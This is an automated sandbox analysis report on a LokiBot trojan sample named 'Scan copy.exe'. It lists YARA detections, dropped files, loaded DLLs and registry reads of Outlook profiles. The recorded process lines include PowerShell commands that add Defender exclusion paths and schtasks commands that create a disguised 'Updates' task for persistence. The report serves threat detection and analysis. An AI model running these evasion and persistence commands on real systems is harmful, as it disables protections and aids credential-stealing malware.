Source: 00000000.00000002.1291320333.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: Process Memory Space: Scan copy.exe PID: 5420, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: vLQwEscoQr.exe PID: 7512, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: vLQwEscoQr.exe PID: 8048, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: Scan copy.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vLQwEscoQr.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, AgyBZslxuiICoVYBCt.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, AgyBZslxuiICoVYBCt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, AgyBZslxuiICoVYBCt.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, Ch3eTBbNYCrXmN2i0X.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, AgyBZslxuiICoVYBCt.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, AgyBZslxuiICoVYBCt.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Scan copy.exe.3907488.0.raw.unpack, AgyBZslxuiICoVYBCt.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Scan copy.exe.6c90000.4.raw.unpack, Ch3eTBbNYCrXmN2i0X.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/17@0/1

Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe

Code function: 20_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

20_2_0040434D

Source: C:\Users\user\Desktop\Scan copy.exe

File created: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe

Jump to behavior

Source: C:\Users\user\Desktop\Scan copy.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1204:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Mutant created: \Sessions\1\BaseNamedObjects\kfAGQRAwo
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03

Source: C:\Users\user\Desktop\Scan copy.exe

File created: C:\Users\user\AppData\Local\Temp\tmp18EC.tmp

Jump to behavior

Source: Scan copy.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Scan copy.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Scan copy.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Scan copy.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Scan copy.exe	Virustotal: Detection: 32%
Source: Scan copy.exe	ReversingLabs: Detection: 23%

Source: C:\Users\user\Desktop\Scan copy.exe

File read: C:\Users\user\Desktop\Scan copy.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Scan copy.exe "C:\Users\user\Desktop\Scan copy.exe"
Source: C:\Users\user\Desktop\Scan copy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Scan copy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Scan copy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Scan copy.exe	Process created: C:\Users\user\Desktop\Scan copy.exe "C:\Users\user\Desktop\Scan copy.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe C:\Users\user\AppData\Roaming\vLQwEscoQr.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process created: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"
Source: C:\Users\user\Desktop\Scan copy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Process created: C:\Users\user\Desktop\Scan copy.exe "C:\Users\user\Desktop\Scan copy.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Process created: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Scan copy.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\Scan copy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Scan copy.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Scan copy.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: Scan copy.exe

